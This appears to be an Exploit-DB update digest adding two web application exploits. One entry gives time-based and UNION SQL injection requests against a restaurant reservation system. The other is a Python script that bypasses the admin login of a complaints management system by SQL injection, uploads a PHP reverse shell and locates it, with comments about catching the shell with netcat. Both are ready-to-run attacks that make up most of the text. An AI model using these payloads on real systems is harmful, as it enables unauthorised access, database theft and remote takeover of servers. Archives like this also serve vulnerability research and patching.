DB: 2020-11-04

2 changes to exploits/shellcodes

Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection
Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution

exploits/php/webapps/48984.txt

@@ -0,0 +1,50 @@
+# Title: Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection
+# Exploit Author: yunaranyancat
+# Date: 02-11-2020
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
+# Version: 1.0
+# Tested On: Ubuntu 18.04 + XAMPP
+
+# Description
+
+The file view-chair-list.php does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection.
+An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
+
+# POC N°1 = Time based blind SQLi
+
+GET /TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1
+Host: [TARGET IP/URL]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+### Server will sleep for 10 seconds before returning the response
+
+# POC N° 2 = UNION based SQLi
+
+### Request (getting current user)
+
+GET /TableReservation/dashboard/view-chair-list.php?table_id=%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176787071%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x71716b7071%29%2CNULL%2CNULL--%20- HTTP/1.1
+Host: [TARGET IP/URL]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Content-Length: 2
+
+### Response
+
+...
+<td class="center hidden-phone">
+<a href="delete-chair.php?chair_id=[REDACTED]root@localhost[REDACTED] class="btn btn-danger"  onclick="if (!Done()) return false; ">Delete Chair</a>
+...

exploits/php/webapps/48985.txt

@@ -0,0 +1,54 @@
+# Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution
+# Date: 3-11-2020
+# Exploit Author: mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip
+# Version: 1.0
+# Tested on: Parrot 5.5.17 + Apache 2.4.46
+# CVE ID : N/A
+
+# replace shell.php with your own php reverse shell
+# change [TARGET URL] to target URL or IP address
+# setup your netcat listener for sum good ol shellz
+
+
+
+#!/usr/bin/python3
+
+import requests
+import time
+
+def sqli_admin():
+	s = requests.Session()
+	data = {"username":"admin'or'1'=1#","password":"hacked"}
+	adminlogin = "http://localhost/crms/admin/ajax.php?action=save_settings"
+	s.post(adminlogin,data=data)
+	return s
+
+def trigger_rce(session):
+	starttime = int(time.time())
+	multipart_form_data = {
+	"name": ("cyberscurity"),
+	"email": ("test@test.com"),
+	"contact" : ("+11111111111"),
+	"about" : ("Nothing much about it"),
+	"img" : ("shell.php", open("shell.php", "rb"))
+	}
+	session.post("http://localhost/crms/admin/ajax.php?action=save_settings", files=multipart_form_data)
+	get_shell(starttime-100,starttime+100,session)
+
+
+def get_shell(start,end,session):
+	for i in range(start,end):
+		 session.get("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")
+		 response = requests.get ("http://localhost/crms/admin/assets/uploads/"+ str(i) +"_shell.php")
+		 if response.status_code == 200:
+			    print("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")
+			
+
+def main():
+	session = sqli_admin()
+	trigger_rce(session)
+
+if __name__ == '__main__':
+	main()

files_exploits.csv

@@ -40802,6 +40802,8 @@ id,file,description,date,author,type,platform,port
 48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 5.4 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php,
 48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php,
 48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
+48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php,
+48985,exploits/php/webapps/48985.txt,"Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,